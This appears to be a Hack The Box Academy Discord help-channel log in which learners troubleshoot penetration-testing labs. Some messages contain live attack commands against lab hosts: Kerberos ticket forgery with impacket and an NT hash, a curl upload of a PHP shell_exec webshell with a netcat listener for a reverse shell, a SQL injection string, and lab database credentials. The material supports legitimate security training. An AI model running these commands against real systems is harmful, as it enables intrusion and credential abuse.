#modules

also try adding -Pn to your scan

I did! It gives something like 'Host is up' with no particular info

here

the command was 'nmap -sC -sV -Pn IP'

Also #starting-point ... with the name of the starting point lab you're working on

By default nmap will scan the most common 1000 ports, it seems like no service returned anything. Likely indicating the host is down or you dont have a route to that IP

It is hard to say what the issue is without more context/visibility

it happens with all the machines so I thought it didn't matter

if it's a starting point machine; #starting-point is the appropriate channel; i'll be willing to try and help with basic troubleshooting there to be sure it isn't a PEBKAC issue before directing you to support

oh im sorry

@patent sky the module is above tier 0; please refrain from sharing info from the module. I generally suggest though to restart your vm and trying again

Oh sorry, I did restart my vm, it doesn't change anything.

did you try switching to tcp or udp vpn, or changing vpn regions?

Thanks you, it was just a vpn problem... I am so dumb!

can any one help with this api attacks I'm stuck guy's
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - I have logged into the target with sqsh -S 10.129.203.12 -U htbdbuser -P MSSQLAccess01! -h, but once I'm in, I can't get anywhere. I have tried listing the DB's with SELECT name FROM master.dbo.sysdatabases, but then I can't select any of them with USE master for example.

how long should i expect winpeas to take? ive had the target despawn on me twice after running for over an hour and forgetting to extend time

Pretty sure only a few mins is good enough

never seen it take anywhere near a single hour let alone several

Sometimes powershell goes 'idle' and pressing a character wakes it up

yea im going along with pen test in a nutshell and it has the output going to a file so nothing is being printed to the screen and it just blinks the cursor, system monitor shows activity but i was letting it run in the background while i work and the target machine depsawned before it finished

i would wiggle the mouse threw remote desktop and the vm stayed responsive the whole time i was paying attention more than 30 min run time

linpeas worked just fine on the linux host

on File Upload Attacks -> Limited File Uploads I never get a response from the server on uploading the payloads.
Tried both in-browser and via burp repeater; there's just no response from the server at all. Been trying for a couple of days. Not a 500 or any kind of response on upload / POST request. Request doesn't hang either- just nothing. No follow-up GET / after upload either

Can't do it over HTB VPN or in the attackbox, because the vpn can't reach the site. (Why isn't it behind the VPN?) so using a kali vm. I've tried on bare metal on multiple machines and networks now, and it just doesn't work.

I see that others have this issue, but noone ever mentions a fix. Can someone please save me from this insanity. thanks.

hi so for question 1 of the skills assessment of the incident handling process module, I am having trouble accessing Virus Total, which I need to access for the section. I tried chatgpting the process to access virus total but the instructions it gave me on how to do it from TheHive won't work.

can someone point me in the right direction?

When recompiling using javac -cp it gives me many error. I am in exploiting web vulnerabilities in Thick Client Applications please help!

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - When I try to crack the hash using hashcat and the pws.list provided in the module, I get nothing. I've also tried rockyou.txt as some have suggested, still get nothing. Any clue?

Good evening, can someone help me with the password attacks module? Pass the certificate.

The hash I got is easily crackable with rockyou

Where are you stuck ?

Hi there y'all, sorry if this is a silly question, but anyone know where in GraphQL was mentioned or found (previously) the way to identify the MD5 hash for a password in Mutations chapter?

Question two, administrator flag...

Maybe go DM to avoid spoiler

Wrong IP or you are not connected to the VPN

but i am in htb instance

Ip is correct ?

yes

Did you spawn the target and waited 2-3 minutes ?

To let them spawn

i have tried multiple vpn servers

hold up lemme try n wait for 5 minutes as u said

i don't think it makes a difference but nvr too wrong to try

Can you even ping the target ?

Is the port 3389 open on this target ?

can ping but port 3389 is closed

So you won’t be able to connect via RDP

any other way

What ports are open ?

wait i don't need rdp

i connect straight from firefox browser in linux

need some help connecting to a wifi network in the** Attacking WPA/WPA2 Wi-Fi Networks** module Enterprise Evil-Twin Attack section. i have all the needed info: domain, username, password, and even cert but still cant connect to the wifi network. furthermore, i even spoofed my mac address to connect however it didnt work... can someone help me? am i missing something??

You need to make sure all the settings are correct when connecting. There's more to it than what you listed.

are you talking about the eap auth method?

You also don't need the domain, the domain prefix in the username is fine

Not just that

@cloud urchin what else? the previous module i took Wi-Fi Penetration Testing Basics doesnt list any other prerequisites i need to connect to an wpa/wpa2 enterprise network. would you mind sheading some light?

or anybody else willing to shed some light for that matter?

You can DM me if you want

Any help please...

Does the entire AD Enum and attacks module HAVE to be done from the linux VM provided in the module?

Hey guys, currently doing the "Footprinting" module, lab "easy" . Can I DM someone about the enumeration ? ||I don't get the part with /etc/hosts at all , I'm familiar with the process of doing it but in this scenario I don't understand the logic behind ||

dm me

I just completed the thick application modules in attacking common applications . They were the worst two sections in the module . They took me many hours . I just followed the steps but I don’t understand why they were included in the course material . The steps I did can apply only to this specific case as I did not receive any general knowledge why can apply in general cases . Please tell me that they are not needed for the exam

No one can say what's on the exam. Your complaint is a pretty common one though.

Bruh I mean I am really frustrated . The module was going very well and straight forward until those two sections

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

It's there just to give you a taste of a bit of application reverse engineering and source code review

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

Have to prepare the mental for the exam, what if you come across it? Or better yet, in the wild. Is your client going to be happy you didnt test a thick application which then was compromised ?

Hello anyone who can help me in "Attacking Wi-Fi Protected Setup - Skills Assessment" ? I am stuck in VirtualCorp PIN finding process in which i noticed that the WPS AP is locked and then there is no way to unlock it ? Is this correct behaviour ?

Hi, does someone know how DonPAPI works?

does it dump credentials from credential locker remotely?

Can I DM please, am stuck at assessment under system information

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

hello everyone, I am just starting this adventure and finished the network fundamentals. Last modul, called skill assessment, there are 3 things to do. I am stuck at chapter 3, target aquired. I need to establish a raw ftp connection with netcat. well, this somehow doesnt work. I cannot login it. They say to login with:
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]
but i just keep getting the error 451, wrong parameters. Anyone having the same problem? I am very thankful for any hints and helps

the things in brackets are telling you to use that key combinations

hey
in
Android Application Static Analysis
Reversing Hybrid Apps
how should i solve this?
Analyze the APK found inside the attached ZIP file. What is the value of the "message" key after logging into the remote service using the debugging code?
i only have one temp debugging key

my god... this took me a while... thank you, iIseemed to work now. Thanks for the fast reply.

you solved this?

hey man did you solved it?

you solved it?

you solve it?

sry for spam : (

have patience, don't ask multiple people in the span of a minute

if the people you're asking are in the US, it's early morning still for them

ok i solve it
it was so easy i had typo
|| only send post request with temp_debugging_key ||

Is lsass.exe invoked during local/AD auth process only?

Or during remote auth as well?

LSASS is invoked during both local and remote authentication and on both sides (client and server) of the connection, depending on where credentials are verified or generated.

About remote do you mean AD environment?

for example, for outlook logon, is lsass.exe invoked?

LSASS is invoked whenever Windows integrated authentication (NTLM/Kerberos/Negotiate) is used, whether locally or remotely.
It is not invoked for purely application-level or web token–based authentication (like modern Outlook/Office 365 logons). Someone can correct me if I am wrong, though.

These is the schema about lsass.exe process, the last point in the remote auth is "AD directory services", why?

seems like it's mixing AD and remote service

The last point “AD Directory Services” exists because LSASS (on the DC) must query the Active Directory database to validate the user’s credentials or tickets during remote/domain authentication. This is what I think.

so if login in outlook for example, that point doesn't exist?

there isn't a complete explaination of this schema in this module

Hello

Who can help me with NoSqLI assessment II?

When Outlook isn’t using AD-integrated authentication, the “AD Directory Services” part of the diagram does not exist in the flow, because the verification is handled elsewhere (cloud, app layer, or external server).

I think you should use that image in AI to get your queries cleared.

Im doing this for hours and hours, but 1 queries produces recursively 2+ queries more lol

this part is not easy

Hello! I'm taking a module related to SCCM.

https://academy.hackthebox.com/module/267/section/3048

I can't run .\pxethief.py correctly. An error occurs when connecting to host 172.50.0.30. What should I do? I've rebooted the lab several times.

Error

anyone?

I'm doing everything as in the module; it's a simple command, but the connection isn't working. I don't know how to fix the lab..

Switch to the US VPN region

What's the difference?) The connection to the lab itself is stable.

anyone help?

I did this. It didn't help

Hi,
Who can help me with cwee nosqli assessment II?

i am stuck in the question What is the the name of the Program listening on localhost:5901 of the Pwnbox the answer xtigervnc is right or wrong..

What module is this?

Module: SQL Injection Fundamentals

Section: Skill Assessment

Link: academy.hackthebox.com/module/33/section/518

In the previous section (reading files) it shows you how to ||check if current user has permissions to read file.||

When I try the same method here that is ||super_priv|| with the ||union injection|| it does not work / throws internal error

Exact Command Used:
||cn’) UNION SELECT 1,2,super_priv,4 FROM mysql.user— ||

Is this because ||super_priv|| doesn’t always exist or ?

for the information gathering web edition fingerprinting, i cannot seem to be able to connect to the vhost. would this require me to ||change the local etc/host file? || or can it be done another way?

did you add the vhost in your /etc/hosts?

nope did not try. i tought it would be an option to specify it in nikto but i could't seem to find it. trying the /etc/hosts file was not someting i did think about, thank you

If a virtual host does not have a DNS record, you can still access it by modifying the hosts file on your local machine. The hosts file allows you to map a domain name to an IP address manually, bypassing DNS resolution.

I'm totaly blind in Injection attack modules in skills assesment I'm unable to get flag I tried js injection to get etc/passwd what should I do after can anyone plz help me?

you can dm me

Hello everyone, I hope you guys are doing well. I am currently in the skill assessment of Pivoting and Tunneling in the CPTS path module, I am facing a problem which is kinda weird to me.

I am doing these labs using the tool ligolo-ng I have my pivot host and configured it properly and took access on the internal host

within that network, and when I write ipconfig to see what is the other network I see the same network address but I can't reach it which is x.x.15.34 < this is the one I can ping with ligolo configured.

but the internal host have a second ip which is is x.x.16.34 I can't ping 😄 I already configured ligolo on x.x.0.0/16, I did try double pivot with the same network address but it doesn't work.

because it's the same network address I guess

can i request for help on the ntlm relay attack question 2..compromising the backup01? i keep getting this error message

[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

seems like the spoolss is not running

do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND 

You ever get this sorted? Ive been stuck on this for most of the morning...I feel like Im missing something SUPER simple haha.

is this to compromise vhost of mail.smtpinjection.htb?

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

Might need to escalate privileges somehow..

ever tried force authentication?

Sorry I don't understand what do you mean. I already searching and try and but still can't get past this.

perhaps registration can help you

Already try registration and put invitation code too but still no clue. Maybe I make wrong technique.

focus on the request being made; that'll be your only hint

@civic inlet Do you mean using the IMPERSONATE function?

I tried that, but didn't get any response

Can I get some hands on advice for the optional exercise in the Cracking Passwords with Hashcat module?

I have made some progress but I dont have much (any) experience exploiting active directory so its a bit lost on me, even though I have cracked a fair few of the hashes

finally after 15 weeks 🙌

@fathom pendant please may I dm you regarding the cpts path. Regarding a topic thats mentioned but I cant see the how to accomplish it side of things.

Awesome work! Great job

which vpn server are you using?

hi!

This module is a real problem..

I changed VPN servers, rebooted the lab multiple times, and on one attempt, the server responded to my command. Instead of a DHCP error, I finally got a response from the server, extracted the hash, and cracked it

But now I have another problem. I'm struggling with the following module page, https://academy.hackthebox.com/module/267/section/3050

I launched the lab, configured Ligolo, and ran all the commands as in the course. But the tables I'm seeing are half-empty, even though they should show complete information.

If you think there's an issue with the labs itself, best to post in #1234357888114364508

Also please take care not to post content from modules above tier 0

There are probably some problems with the SSCM server again. I've rebooted the lab many times already, but it doesn't help. Neither does changing VPN servers.

yeah this one's known issue we are working on fix. though it was working fine on US Server afaik.

What's the problem, even superficially? The lab starts up, the Windows machine works, I can connect via RDP, and the desired host can be pinged throw ligolo

Until this moment, I didn't know there was a problem in the lab. Again, you're scolding me for trivial things))

How did I scold you? I just said if you think there's an issue you'd want to report it in #1234357888114364508.

The posting above tier 0 is just a general thing

You scolded me for the screenshot and deleted it, citing the disclosure of confidential information.

Two separate things, and it's a terms of service thing I wouldn't really call it trivial. Not like I muted you or something I just reminded you of the rule.

calm down guys!! He was just informing you about that not scolding you.

Okay, I won't argue. There was already a long dialogue in the chat about the overly harsh policy few weeks ago, which led to nothing.

This chat is for asking only basic questions about basic problems. If you have complex technical issues with labs, instruments, or infrastructure, this chat is useless. Unfortunately, an abstract description of the problem doesn't convey much information((

@raven quail Thanks for your response! I hope the problem gets resolved soon.

hello i am currently working on a linux module and trying to connect to ssh but when it asks for my password it will not let me type in the CLI

Well think about it this way, anyone who has completed the module knows exactly what to do and doesn't really need a lot of detail. Also if you feel like you need to reveal a little more you can take it to DMs.

Hi. I'm working on the Citrix Breakout submodule in Windows Privilege Escalation. I tried to connect to the SMB from the target using \\10.xxx.xxx.xxx\share as the UNC path.

In addition, I have connected to the smbserver.py in XFCE box, but the Citrix couldn't connect to the SMB and instead, it returne an error like this image

Is there any workarounds for this?

Hey , can anyone help me in the module "Information gathering -web edition" and the section is "Web Archives" . So in the question number 4 it is not accepting my answer , can anyone tell me what is happening ?

dm me

Recall what was taught in the Pivoting, Tunneling, and Port Forwarding module regarding IP addresses and subnets

module: https://academy.hackthebox.com/module/110/section/1054#questionsDiv

hello
What could be the problem? My "admin" request returns a 302, not a 200.

looks like you might be fundamentally misunderstanding the question:
you're meant to fuzz the ip:port and the GET request should look something like
GET /admin/§FUZZ§.html

Is this normal? Even when I log in manually, I get a blank page.

you don't need to log in; you're fuzzing for an html page :)

think of it like this; you're looking for a file at http://ip:port/admin/somefile.html

Is the job role path Bug Bounty gone? It still changed its name.

It's CWES now - Certified Web Exploitation Specialist. Path itself has changed a bit #📣-announcements message

is there a reason some of the machines spawned for the exercises are on the open internet and some get spawned in the htb network and need a vpn to access?

I feel like they used to all be internal, but more and more they are just spun up on the open internet

generally speaking; it depends on the focus of the module and section.
the open internet questions, for instance, aren't going to require a reverse shell or callback to complete

for example I am doing the "hacking wordpress" module atm, the machine is on the internet and one of the exercises is to put a web shell in the theme

yes web shell, not reverse shell :)

I guess my question is, why put some on the internet at all, why not keep them all internal?

resource stuff; also a lot easier/cheaper to host basic web apps on a droplet than a dedicated vm for one thing (if the underlying OS isn't what's important)

that makes sense, I guess as htb has scaled they looked for more cost effective way

I feel like in the beginning it was all internal machines

well, some of the modules predate some of the bigger scaling they've done and still have the ip:port, but again as a general rule of thumb -- if it's a public IP - focus on the app (unless instructed otherwise) and not on getting a reverse shell or a way for the machine to call back to you

it's a common hiccup in the Getting Started module - Public Exploits Section. People do all this scanning on the public IP, they don't focus on the IP:PORT -- which contains the vulnerability

For me it raised the question, is there some sort of "permission to attack" baked into the HTB academy TOS? Since these machines are technically just public facing machines and we are attacking them over the internet

they are owned by HTB

the Intro to Academy module (https://academy.hackthebox.com/module/details/15) talks a bit about it

been a while since I did that one 😛

thanks for the info

Module: DACK Attacks II
Section: SPN Jacking
Question: Abuse Gabriel's rights to compromise the account that has WriteSPN on SRVWEB07. Use the live SPN Jacking technique to compromise WEB01 using SRVWEB07 SPN and read the flag located at C:\Users\Administrator\Desktop\flag.txt.

I followed every step / command shown in Live SPN Jacking but it gives me an error when trying to connect to WinRM.
Tried to change the SPN to HTTP/WEB01, WSMAN/WEB01, HOST/WEB01, and even tried RDP with TERMSRV/WEB01.
Nothing is working.

Now I did the same from linux, still not working.

└─$ impacket-getST -spn 'MSSQL/SRVWEB07.inlanefreight.local' -impersonate Administrator 'inlanefreight.local/SRV01$' -hashes :04ff9221b8cdb658d989473f51ae0a42 -dc-ip 172.16.92.10 -altservice "cifs/WEB01.inlanefreight.local"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from MSSQL/SRVWEB07.inlanefreight.local@INLANEFREIGHT.LOCAL to cifs/WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL
[*] Saving ticket in Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
                                                                                                                                                    
┌──(kali㉿kali)-[~/htbacademy]
└─$ export KRB5CCNAME=Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
                                                                                                                                                    
┌──(kali㉿kali)-[~/htbacademy]
└─$ impacket-smbexec -k -no-pass 172.16.92.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

nvm, finally did it after a LOT of debugging.

hello, I am on the pass the ticket module for linux (https://academy.hackthebox.com/module/147/section/1657) I am needing help understanding decrypting a hash for the svc_workstations account, when i did the dump i only found a hash for aes-256, which i tried hashcat and crackstation, with no luck, the hint says are there any other keytabs, i found that user and cracked the NTLM hash, but could not ssh with -p 2222 with that user. I used process of elimination, and guessed the password for teh svc_workstation account, but i would really like to understand what to do when running into an aes-256 hash like that, any help woul dbe appreciated

you don't need to crack the aes-256 part; NTLM will do

hmmm, it wasn't displaying the NTLM for that user

this is what i got

i did find the NTLM for the other user's keytab, but i couldn't log into the the target with that

There is an other way to check for known hashes on internet

Hi, I have been working on the LFI skill assessment and am struggling to find uploaded files. I was able to achieve read access and the php ini file does not have an upload dir set, so it should default to system. But when I upload a pdf and try to read it in /tmp or /var/tmp it cannot be found.

It also cannot be found in the uploads section of the site.

There is more information I can provide if anyone is open to dm, trying to be careful and avoid spoiling.

maybe check if something is happening to the file when you upload it 😉

@lone ferry those would be subdomains

Ffuf works gobuster doesn’t wondering why

is inlanefreight.local in your /etc/hosts file?

Yes

also did you try adding --append-domain ?

That works. Should add that to the walkthrough writeup.

also you said 'Attacking Common Applications' Skill Assessment 2?

Yes. Thanks for the help.

that's the first SA, not the second

wait nvm

my brain had stuff flipped

lol been busy lately

Please read the show solution for 2.

i was thinking 3 not 2

Ok. Cheers

also don't share solutions from the official writeup; especially since the module is above tier 0

Just got it 🙂 Spent the past 2 hours troubleshooting payloads and paths only to realize cyberchef was including a new line the entire time.

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

Hey I am on attacking common applications -> attacking applications connecting to services . However I can get the sql credentials as shown in the course . I get error about memory .

You don't need WinRM to read a file.

hi so for the skills assessment of incident handling process, how do I access VirusTotal?

I need to know that much for question 1 so I can solve the question

I looked for it and tried chatgpting it and didn't get good results

can someone give me a hint?

I am gonna google it but the results on YouTube aren't very good either

To access VirusTotal you first need to navigate to it, the UI is quite self-explanatory on how to use it

I'm trying to import a ccache file on question 5 on the pass the ticket linux section of the module (https://academy.hackthebox.com/module/147/section/1657), i don't want to paste a screenshot as its the commands and don't want to spoil anything can anyone help? when i run klist it doesn't seem to be using the ccache even though it shows it when i use klist

I looked it up and to go to virustotal, I need to access the web app's IP on port 9001 and it won't let me connect

so that already is not self-explanatory

are you going to virustotal.com lol

Hey guys,
Anybody here who would kindly help me a bit with the final skill assesment in SQL Injection fundamentals ? I am a little lost after few steps

If any one can please DM me so i can share the screenshot, maybe i am doing somethign wrong or missing something

Quick question:
If curl -k <ip> | grep -i ‘/themes/‘ finds the theme

Why doesn’t wpscan?

Because for some reason wpscan works better with an api token

I had a lot of fun with wpscan

Try to construct a comprehensive wpscan for a good output

It came in handy with a lot of CTFs

Did you get the help you needed?

Did you get the help you needed?

hey guys, just started the public exploit module. Upon running the exploit it works perfectly fine on the HTB terminal and I retrieve the flag, however when i run the same setup on my kali machine, it has a "server did not respond in an expected way". I can ping the IP, visit the website from my kali machine, but there seems to be some connectivity issue i can't pin point. I've doubled checked all my settings for the exploit, firewalls, vpn, even manually tried to retrieve the file and didn't work. Any one that can help or had same issue, please let me know.

try resetting the lab and trying again

I did that 3 times already to be sure, and I can successfully run the exploit on the HTB terminal so no issue there.

not sure what could be wrong with your kali machine then ¯_(ツ)_/¯

already try to register and modify the invitation code the forward the request but got this error. how then ?

interesting, from my kali machine i can telnet to the ip:port, i can visit the website, but running the exploit, it doesn't establish the connection.

can someone figur out why it is taking infinity to run winPEAS on windows target

done the reset servers and instance whats bloking it i dont know

The target machines do not have internet access so attempting to download winpeas through them will always fail
nvm didn't see the terminal on the right but you can probably open another terminal or folder and check the contents of the output file

Happens a lot, for the most part it gets stuck on a section "collecting firewall rules" , you gotta press enter to engage it back, and the next part it gets lost is the "search for credentials" or smth like that.

Vut yeah as 0x said, check the file with output.

Tried SMB and RDP, didn't work too

Yes i have completed the AI Red Teaming Track. Thanks for checking.

i would always just rdp with a folder mount for transferring tools when i had issues, but why are u trying to output it as a txt lol

windows behave very strange with Linpeas and i am new to powershell and found the file is already downloaded to the folder, no blink or success message no exit code to verify.

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

For some reason, the top-usernames-shortlist.txt file didn't find anything.

From the error it looks like you fuzzed directories not the cookie

thanks

Hey I am on attacking common applications -> attacking applications connecting to services . However I can get the sql credentials as shown in the course . I get error about memory .

I also tried b*main+433 but it won’t show me register values

Hello.
I am doing the SQL Injection Fundamentals module and I am a little stuck on the final assessment.
I can make an account with an SQL injection and log in, but I font know what to do next. Could somebody please point me un the right direction ? I cant for the life of me figure out what to do next. There are no responses, no outputs, just always either html error 500 or nothing really happens when I try to play with the burp suite requests.
Dm pls if anybody could help

Hello, I'm working on the Skills Assessment - Password Attacks.
I'm having trouble getting ligolo to work properly while working on it. Is there any solution?

@Module: Password attacks , credential hunting in Linux. I'm not getting how to solve this one. I got access to the logins.json but the username and password was encrypted . I'm not able to access the firefox_decrypt tool to the target.tmechen

You were able to bring over the firefox_decrypt tool, but couldn't get it to run or work correctly?

Hello, windows fundamentals appear to be broken, both smbclient -L SERVER_IP -U htb-student and smbclient '\SERVER_IP\Share' -U htb-student are broken, they return NT_STATUS_IO_TIMEOUT, I tried tweaking in the smb.conf to maybe adjust the min and max protocol but nothing works 🙁

can something be done about it?

how you fixed it? thanks

image?

from what I can see its been an ongoing issue for over a year with this specific module, it would be great if someone would take a look into it

no ligolo to work properly

Sorry, I managed to figure it out on my own.

that's what I am asking - what did you do to make it work properly? thanks

Oh, I see !
I changed the MTU value.
For details, I resolved it by executing the command below.

sudo ip link set tun0 mtu 1300

Nice, I'll note this down.

hello guys, there is new update in sql injection fundamentals, skills assessment, who is able to help me with last question?

I always do this whether I'm working on labs or academy

Set the MTU 1000

Hi everyone, are there some modules about AD to learn it? The password attacks module talsk about AD but i dont know what is it

Yes Introduction To Active Directory and AD Enumeration & Attacks

Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
someon to assit me here..i think i know the way but its not working

Hi everyone,

I finished the "Pivoting, Tunneling, and Port Forwarding" Skills Assessment.

But i have a question :

sudo proxychains nmap -Pn -sT -v ip -p 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

proxychains nmap -Pn -sT -v ip -p 3389

PORT     STATE SERVICE
3389/tcp filtered  ms-wbt-server

Is this normal ? they dont talk about this in the modules and i wanted to know why but even the cat struggle to explain

I have problem with getting accepted HTTP methods in Bypassing Basic Authentication section in Web Attacks module.
I used the command curl -i -X OPTIONS http://<HOST>:<PORT>/, but got a HTML document without Allow response header.
Does anyone knows why this behavitor occurs?

yes, it's normal, typically speaking sudo is gonna be required for proxychains

it's just not set up to tell you what's allowed, you can ignore this and move on

for real, on many walkthrough i didnt see it. is there a reason why it need sudo ?

nmap need it for raw packets

Because they were already root

When laauching the command

^

many people have the bad habit of running around their system as root

yeah it might

Isnt it by default on ?

no

On kali I mean

no

it hasn't been the default on Kali for AGES

Don't use kali that's why I ask

If you know what you're doing then it's not an issue, but I do agree with you in general.

Kali USED TO have it where your login was root:toor; but then they changed it to a user:pass for the premade vms

hey guys

can someone have with me sanity check about hacking wordpress module ?

you're insane; sanity: checked
(i haven't done that module, but it also helps to say which section you're having trouble with)

Someone?

for the Information Gathering - Web Editionskills assessment. i cannot seem to get to the target "hidden admin directory" i know what the directory is but it just does not let me access the directory. (fixed)

which section?

dm me

The one with sharing the folder, ill hsve to check with vanilla settings and turning off firewall from private bc i tried it with adjusted config

But idk if this is a cknfirmed solution

Kinda frustrating since it looks like a known issue that has not been addressed whatsoever

can you tell me the exact section you're referring to?

NTFS vs. Share Permissions?

On Windows Fundamentals
under NTFS vs. Share Permissions

Yeah, sry, had to find it

Since im at work r

Rn

There's no SMB port open, so you can't use smbclient. Just use RDP to answer the questions.

I tried opening p 445

But it didnt help either

You don't have the permission to open it. Just a basic user is provided to solve the questions.

I mean, on the pwnbox I have sudo, would it have to be opened on the server?

No, for what exactly?

So should using iptables enough to open port 445 via sudo on the host to make it work? Bc it doesnt in this case

I dont understand what you mean then, if it doesnt have to be opened on the server but rather the host, it has been done

in the module it's just shown as an example, I don't think you have to actually use smbclient

Hey guys, I'm working on the Advanced XSS and CSRF Exploitation - Skills Assessment. I'm stuck at the last part. I've tried variations of the payload shown as an example in that section of the module, but I either get no response or I get ||{"error":"Something went wrong"}||. I know what I'm supposed to do, but I can't seem to figure out how to correctly modify the payload. Is anyone available for help?

Hi,

Sry to bother you,

But when I checked on htb academy they don't specify to use sudo.

Neither in the walkthrough where we can see if the terminal is root or not.

Am I wrong or bc if the course said to use this command I wouldn't think to use sudo.

Unlike nmap where sudo need to be used for SYN Scan

Its mostly because of how proxychains works, not necessarily nmap in this instance.

Is there an issue with the HTB academy atm? All locations are showing 100000ms and I can't seem to start an instance

That's usually a connection issue or error on one end. https://status.hackthebox.com ; i also suggest logging out then back in and refreshing cache [ctrl+shift+r]

Reload your page

Thanks, that solved it

that new blue team cert coming soooooon

Hi i am unable to get this answer write in static analysis of android application module

Any idea?

@blazing cloak Please don't post content from modules above tier 0

oh sorry, where can i asl for help on this server?

Here, just don't post content from modules above tier 0

haha sure, my bad

Hey guys, i've been stuck for some time in the question of cracking the hash of Mark's password. There some information about him that i am supposed to generate a wordlist then mutate it and then perform a dicitionary attack. But it seems like my mutated list isnt working. Any help / advice? thanks in advance
Module: Password Attacks
Section: Writing Custom Wordlists and Rules

Yes

You can DM what you are trying.

@boreal basalt dont dm people witjout asking

?

I think you are trying too hard

In the section information are display you need to create a password with them

It's very simple just add the information and create a long enough password (minim 12 character, etc.)

You sent a dm request earlier

y for help, i can't ?

No. I didn't ask you to, and you didnt ask to. See #rules ; the only exceptions are for server moderation issues (reporting another user) and whats in my bio,

u right mb

I've added it to a .list file and added 1 word per line and also made the minimum length 12. Is this the right way?

you know a password is a following of word so you got the step 1 create a list

But now you have to use the hashcat rule to create a password like Password2022, Password2022! who is atleast 12 character

if you dont understand reread the section (for real, this help a lot)

Hello can I DM someone for help for the Second skill assessment of AD Enum&Attack module I have such a weird thing and I don't want to spoil

$[char] is the format to append a character at the end

(Drop the brackets of course)

Just like with several other modules, the newest one on Forensics on Linux also doesn't let you download the Cheat Sheet. I assume the team is aware of that, considering that there have been a few mentions here on Discord already?

scratch that, seems to have been fixed for the other ones (that I remember), so just for Linux Forensics now

I am on attacking common application skill assessment 1 . I have command execution by appending &<command> to a url . However commands such as dir work but whoami , powershell etc do not. Any ideas ?

Well... youre not gonna get an interactive shell solely off of just running powershell via a webshell

Could anyone give a nudge on Abuse taino's rights to compromise SDE01 and read the flag located at C:\Users\Administrator\Desktop\flag.txt DACL Attacks II Skills Exam. I think I have the right idea, just not sure if I'm executing properly

I have an issue with a skill assessment for windows lateral movement I am on the 4th question when it asks what is the password for WSUS admin can someone dm me who has done so i can get a hint or something because i have been doing this for over a week, i did password spray, i did inveigh, i tried looking for the files on the wsus machine, i have tried mimikatz and also tried others sooo i have no clue.

You can DM me

@cloud urchin messaged you.

So what do you suggest ? And why what i said won’t work?

Does anybody know why I’m getting these errors and how to potentially fix them?

Hey I can't reach the (ACADEMY-PWATTCK-CREDDEV01) for the Attacking Windows Credential Manager in Password Attacks module

I tried a new vpn, and resetting but still nada

Hey I wanna run a powershell rev shell command (e.g powershell -e <base64> via the web shell so that I get a connection back on my machine and have an interactive shell . Isn’t that possible?

another way would be pulling over an msfvenom exe and running it

Agreee but what I thought shouldn’t work too?

Hi I am currently doing Attacking Common Services Skills Assesment Easy module. I am able to get the credentials and searched online and saw 2 methods via FTP and via SQL.

Can't seem to get the FTP method to work currently. I am able ot upload the shells but can't seem to get it to execute. Anyone faced this issue before and managed to get it working?

Cant figure out if it is a directory traversal issue or a wrong revshell issue

Where exactly are you ? Common application or common services ?

sorry typo common services

so far i tried diff shells the latest is Powershell #3(Base64), i copied this shell into this

curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary '<?php shell_exec("SHELL"); ?>' --path-as-is https://10.129.203.7/../../../../../../d.php

then on another terminal i ran nc -lvnp 8001 but theres nothing after i ran

looks close just reconsider that shell_exec function, also since it's an LFI, think about where you're putting that data on the machine and how it also needs to be accessible through webpage

you're leaking a password in the url bar brother! also just screenshot lol

Shit I just saw that thanks for letting me know lol

still cannot ping or reach ACADEMY-PWATTCK-CREDDEV01 in Password Attacks > Attacking Windows Credential Manager

Does anybody know what I’m doing wrong? I’ve been stuck on this part for a bit

check if the dit file is the same size

you do realize you're supposed to replace the parameter values right?... like lmhash:nthash is not gonna work cos those aren't real hashes, and I assume that SYSTEM also isn't the system file you grabbed

Hello Guys,
I'm stuck at the graphlql attack module on injection attacks.. I know that I can select the objects like username, password etc. in the SQLi but I can't select the flag in username?
Anybody can help me or can say where is my mistake?

I stuck with this too

Inbox for the answer

Hello guys, in module network Foundations and in the second question when i try to answer it doesnt accept my answer even when that answer is the right one. The question is What is the the name of the Program listening on localhost:5901 of the Pwnbox? what should I do

What your answer?

VNC (Virtual Network Computing)

Wrong

Use netstat and you will see the service with port 5901

Almost correct

Can u show me the answer or no

you gotta be more specific with your answer, there's several different VNC programs out there

Network Foundations module, skills assesment content question 2

i found it

nevermind

hahaha sorry i still dont really get

tried another shell and another path but it doesnt work too
